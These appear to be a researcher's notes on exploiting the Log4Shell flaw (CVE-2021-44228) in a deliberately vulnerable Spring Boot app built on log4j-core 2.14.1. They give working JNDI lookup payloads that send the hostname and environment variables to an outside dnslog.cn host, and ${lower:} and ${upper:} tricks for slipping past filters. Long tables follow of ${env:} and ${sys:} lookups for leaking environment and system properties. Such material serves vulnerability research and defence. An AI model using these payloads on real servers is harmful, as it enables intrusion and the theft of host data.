https://twitter.com/jas502n/status/1468946197629272066
default use :
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
mvn dependency:tree
[INFO] | | +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile
[INFO] | | | +- ch.qos.logback:logback-classic:jar:1.2.7:compile
[INFO] | | | | \- ch.qos.logback:logback-core:jar:1.2.7:compile
[INFO] | | | +- org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile
[INFO] | | | \- org.slf4j:jul-to-slf4j:jar:1.7.32:compile
[INFO] | | \- org.slf4j:slf4j-api:jar:1.7.32:compile
change pom.xml
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
$ java -jar log4jRCE-0.0.1-SNAPSHOT.jar
[*] CVE-2021-44228 Log4j2 Remote Code Injection
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.6.1)
2021-12-10 16:18:43.099 WARN 48536 --- [ main] o.s.boot.StartupInfoLogger : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts).
2021-12-10 16:18:48.108 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target)
2021-12-10 16:18:48.109 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : No active profile set, falling back to default profiles: default
2021-12-10 16:18:48.890 INFO 48536 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
2021-12-10 16:18:48.902 INFO 48536 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
2021-12-10 16:18:48.902 INFO 48536 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
2021-12-10 16:18:48.957 INFO 48536 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
data=xxxxx
HTTP/1.1 200
Content-Type: text/html;charset=UTF-8
Content-Length: 15
Date: Fri, 10 Dec 2021 08:38:50 GMT
Connection: close
log4j2 success!
默认 Map 预先填充了 hostName 的值,该值是当前系统的主机名或IP地址,
参考文档:https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html
org.apache.logging.log4j.core.LoggerContext#setConfiguration
${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}
Example:
// log4j2 Default,For(Windows、Linux、macOS....)
${jndi:dns://${hostName}.iwk5r1.dnslog.cn}
// Equivalent to windows command(set|findstr your-hostname)
${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn}
${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}
https://github.com/woodpecker-appstore/log4j-payload-generator
this.strLookupMap.put("lower", new LowerLookup());
org.apache.logging.log4j.core.lookup.LowerLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
@Plugin(
name = "lower",
category = "Lookup"
)
public class LowerLookup implements StrLookup {
public LowerLookup() {
}
public String lookup(final String key) {
return key != null ? key.toLowerCase() : null; // toLowerCase()
}
public String lookup(final LogEvent event, final String key) {
return this.lookup(key);
}
}
Example:
data=${lower:JNDI}
2021-12-14 10:05:12.051 ERROR 31355 --- [io-18080-exec-6] c.e.l.Log4jRceApplication : >>> jndi
this.strLookupMap.put("upper", new UpperLookup());
org.apache.logging.log4j.core.lookup.UpperLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
@Plugin(
name = "upper",
category = "Lookup"
)
public class UpperLookup implements StrLookup {
public UpperLookup() {
}
public String lookup(final String key) {
return key != null ? key.toUpperCase() : null;
}
public String lookup(final LogEvent event, final String key) {
return this.lookup(key);
}
}
Example:
data=${upper:jndi}
2021-12-14 10:08:29.286 ERROR 31355 --- [io-18080-exec-8] c.e.l.Log4jRceApplication : >>> JNDI
ID | usage | method |
---|---|---|
1 | ${java:version} | getSystemProperty("java.version") |
2 | ${java:runtime} | getRuntime() |
3 | ${java:vm} | getVirtualMachine() |
4 | ${java:os} | getOperatingSystem() |
5 | ${java:hw} | getHardware() |
6 | ${java:locale} | getLocale() |
org.apache.logging.log4j.core.lookup.JavaLookup
public String getHardware() {
return "processors: " + Runtime.getRuntime().availableProcessors() + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model") + this.getSystemProperty(", instruction sets: ", "sun.cpu.isalist");
}
public String getLocale() {
return "default locale: " + Locale.getDefault() + ", platform encoding: " + this.getSystemProperty("file.encoding");
}
public String getOperatingSystem() {
return this.getSystemProperty("os.name") + " " + this.getSystemProperty("os.version") + this.getSystemProperty(" ", "sun.os.patch.level") + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model");
}
public String getRuntime() {
return this.getSystemProperty("java.runtime.name") + " (build " + this.getSystemProperty("java.runtime.version") + ") from " + this.getSystemProperty("java.vendor");
}
private String getSystemProperty(final String name) {
return this.spLookup.lookup(name);
}
public String getVirtualMachine() {
return this.getSystemProperty("java.vm.name") + " (build " + this.getSystemProperty("java.vm.version") + ", " + this.getSystemProperty("java.vm.info") + ")";
}
CLASSPATH,HOME,JAVA_HOME,LANG,LC_TERMINAL,LC_TERMINAL_VERSION,LESS,LOGNAME,LSCOLORS,LS_COLORS,MAIL,NLSPATH,OLDPWD,PAGER,PATH,PWD,SHELL,SHLVL,SSH_CLIENT,SSH_CONNECTION,SSH_TTY,TERM,USER,XDG_RUNTIME_DIR,XDG_SESSION_ID,XFILESEARCHPATH,ZSH,_
id | usage |
---|---|
1 | ${env:CLASSPATH} |
2 | ${env:HOME} |
3 | ${env:JAVA_HOME} |
4 | ${env:LANG} |
5 | ${env:LC_TERMINAL} |
6 | ${env:LC_TERMINAL_VERSION} |
7 | ${env:LESS} |
8 | ${env:LOGNAME} |
9 | ${env:LSCOLORS} |
10 | ${env:LS_COLORS} |
11 | ${env:MAIL} |
12 | ${env:NLSPATH} |
13 | ${env:OLDPWD} |
14 | ${env:PAGER} |
15 | ${env:PATH} |
16 | ${env:PWD} |
17 | ${env:SHELL} |
18 | ${env:SHLVL} |
19 | ${env:SSH_CLIENT} |
20 | ${env:SSH_CONNECTION} |
21 | ${env:SSH_TTY} |
22 | ${env:TERM} |
23 | ${env:USER} |
24 | ${env:XDG_RUNTIME_DIR} |
25 | ${env:XDG_SESSION_ID} |
26 | ${env:XFILESEARCHPATH} |
27 | ${env:ZSH} |
=E:,=ExitCode,A8_HOME,A8_ROOT_BIN,ALLUSERSPROFILE,APPDATA,CATALINA_BASE,CATALINA_HOME,CATALINA_OPTS,CATALINA_TMPDIR,CLASSPATH,CLIENTNAME,COMPUTERNAME,ComSpec,CommonProgramFiles,CommonProgramFiles(x86),CommonProgramW6432,FP_NO_HOST_CHECK,HOMEDRIVE,HOMEPATH,JRE_HOME,Java_Home,LOCALAPPDATA,LOGONSERVER,NUMBER_OF_PROCESSORS,OS,PATHEXT,PROCESSOR_ARCHITECTURE,PROCESSOR_IDENTIFIER,PROCESSOR_LEVEL,PROCESSOR_REVISION,PROMPT,PSModulePath,PUBLIC,Path,ProgramData,ProgramFiles,ProgramFiles(x86),ProgramW6432,SESSIONNAME,SystemDrive,SystemRoot,TEMP,TMP,ThisExitCode,USERDOMAIN,USERNAME,USERPROFILE,WORK_PATH,windir,windows_tracing_flags,windows_tracing_logfile
id | usage |
---|---|
1 | ${env:A8_HOME} |
2 | ${env:A8_ROOT_BIN} |
3 | ${env:ALLUSERSPROFILE} |
4 | ${env:APPDATA} |
5 | ${env:CATALINA_BASE} |
6 | ${env:CATALINA_HOME} |
7 | ${env:CATALINA_OPTS} |
8 | ${env:CATALINA_TMPDIR} |
9 | ${env:CLASSPATH} |
10 | ${env:CLIENTNAME} |
11 | ${env:COMPUTERNAME} |
12 | ${env:ComSpec} |
13 | ${env:CommonProgramFiles} |
14 | ${env:CommonProgramFiles(x86)} |
15 | ${env:CommonProgramW6432} |
16 | ${env:FP_NO_HOST_CHECK} |
17 | ${env:HOMEDRIVE} |
18 | ${env:HOMEPATH} |
19 | ${env:JRE_HOME} |
20 | ${env:Java_Home} |
21 | ${env:LOCALAPPDATA} |
22 | ${env:LOGONSERVER} |
23 | ${env:NUMBER_OF_PROCESSORS} |
24 | ${env:OS} |
25 | ${env:PATHEXT} |
26 | ${env:PROCESSOR_ARCHITECTURE} |
27 | ${env:PROCESSOR_IDENTIFIER} |
28 | ${env:PROCESSOR_LEVEL} |
29 | ${env:PROCESSOR_REVISION} |
30 | ${env:PROMPT} |
31 | ${env:PSModulePath} |
32 | ${env:PUBLIC} |
33 | ${env:Path} |
34 | ${env:ProgramData} |
35 | ${env:ProgramFiles} |
36 | ${env:ProgramFiles(x86)} |
37 | ${env:ProgramW6432} |
38 | ${env:SESSIONNAME} |
39 | ${env:SystemDrive} |
40 | ${env:SystemRoot} |
41 | ${env:TEMP} |
42 | ${env:TMP} |
43 | ${env:ThisExitCode} |
44 | ${env:USERDOMAIN} |
45 | ${env:USERNAME} |
46 | ${env:USERPROFILE} |
47 | ${env:WORK_PATH} |
48 | ${env:windir} |
49 | ${env:windows_tracing_flags} |
50 | ${env:windows_tracing_logfile} |
ANT_HOME,COMMAND_MODE,GOBIN,GOPATH,GOROOT,GRADLE_HOME,HOME,HOMEBREW_BOTTLE_DOMAIN,JAVA_HOME,JAVA_MAIN_CLASS_3651,LC_CTYPE,LESS,LOGNAME,LSCOLORS,LaunchInstanceID,OLDPWD,PAGER,PATH,PWD,SECURITYSESSIONID,SHELL,SSH_AUTH_SOCK,TIME_STYLE,TMPDIR,USER,VERSIONER_PYTHON_VERSION,XPC_FLAGS,XPC_SERVICE_NAME,ZSH,__CF_USER_TEXT_ENCODING
id | usage |
---|---|
1 | ${env:ANT_HOME} |
2 | ${env:COMMAND_MODE} |
3 | ${env:GOBIN} |
4 | ${env:GOPATH} |
5 | ${env:GOROOT} |
6 | ${env:GRADLE_HOME} |
7 | ${env:HOME} |
8 | ${env:HOMEBREW_BOTTLE_DOMAIN} |
9 | ${env:JAVA_HOME} |
10 | ${env:JAVA_MAIN_CLASS_3651} |
11 | ${env:LC_CTYPE} |
12 | ${env:LESS} |
13 | ${env:LOGNAME} |
14 | ${env:LSCOLORS} |
15 | ${env:LaunchInstanceID} |
16 | ${env:OLDPWD} |
17 | ${env:PAGER} |
18 | ${env:PATH} |
19 | ${env:PWD} |
20 | ${env:SECURITYSESSIONID} |
21 | ${env:SHELL} |
22 | ${env:SSH_AUTH_SOCK} |
23 | ${env:TIME_STYLE} |
24 | ${env:TMPDIR} |
25 | ${env:USER} |
26 | ${env:VERSIONER_PYTHON_VERSION} |
27 | ${env:XPC_FLAGS} |
28 | ${env:XPC_SERVICE_NAME} |
29 | ${env:ZSH} |
id | usage |
---|---|
1 | ${sys:awt.toolkit} |
2 | ${sys:file.encoding} |
3 | ${sys:file.encoding.pkg} |
4 | ${sys:file.separator} |
5 | ${sys:java.awt.graphicsenv} |
6 | ${sys:java.awt.printerjob} |
7 | ${sys:java.class.path} |
8 | ${sys:java.class.version} |
9 | ${sys:java.endorsed.dirs} |
10 | ${sys:java.ext.dirs} |
11 | ${sys:java.home} |
12 | ${sys:java.io.tmpdir} |
13 | ${sys:java.library.path} |
14 | ${sys:java.runtime.name} |
15 | ${sys:java.runtime.version} |
16 | ${sys:java.specification.name} |
17 | ${sys:java.specification.vendor} |
18 | ${sys:java.specification.version} |
19 | ${sys:java.vendor} |
20 | ${sys:java.vendor.url} |
21 | ${sys:java.vendor.url.bug} |
22 | ${sys:java.version} |
23 | ${sys:java.vm.info} |
24 | ${sys:java.vm.name} |
25 | ${sys:java.vm.specification.name} |
26 | ${sys:java.vm.specification.vendor} |
27 | ${sys:java.vm.specification.version} |
28 | ${sys:java.vm.vendor} |
29 | ${sys:java.vm.version} |
30 | ${sys:line.separator} |
31 | ${sys:os.arch} |
32 | ${sys:os.name} |
33 | ${sys:os.version} |
34 | ${sys:path.separator} |
35 | ${sys:sun.arch.data.model} |
36 | ${sys:sun.boot.class.path} |
37 | ${sys:sun.boot.library.path} |
38 | ${sys:sun.cpu.endian} |
39 | ${sys:sun.cpu.isalist} |
40 | ${sys:sun.desktop} |
41 | ${sys:sun.io.unicode.encoding} |
42 | ${sys:sun.java.command} |
43 | ${sys:sun.java.launcher} |
44 | ${sys:sun.jnu.encoding} |
45 | ${sys:sun.management.compiler} |
46 | ${sys:sun.os.patch.level} |
47 | ${sys:sun.stderr.encoding} |
48 | ${sys:user.country} |
49 | ${sys:user.dir} |
50 | ${sys:user.home} |
51 | ${sys:user.language} |
52 | ${sys:user.name} |
53 | ${sys:user.script} |
54 | ${sys:user.timezone} |
55 | ${sys:user.variant} |